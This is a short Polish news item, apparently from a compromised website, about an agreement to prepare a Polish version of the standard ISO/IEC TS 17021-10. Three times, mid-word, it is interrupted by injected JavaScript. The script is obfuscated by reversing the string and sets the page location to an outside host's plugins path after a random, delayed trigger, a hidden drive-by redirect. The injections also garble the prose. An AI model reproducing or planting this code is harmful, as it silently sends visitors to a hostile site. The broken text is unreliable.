Opracowanie projektu polskiej wersji normy ISO/IEC TS 17021-10P

Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarzyszenia Polskie Forum ISO 45000 wraz Polskim Komitetem Normalizacyjnym w dniu 25.04.2019 podpisało umowę dotyczącą opracowania projektu polskiej wersji normy ISO/IEC TS 17021-10P Ocena zgodności – Wymagania dla jednostek prowadzących audity i certyfikację systemów zarządzania. Część 10: Wymagania dotyczące kompetencji do auditoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towania i certyfikacji systemów zarządzania bezpieczeństwem i higieną pracy.

Ustalony termin realizacji projektu – listoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topad 2019 r.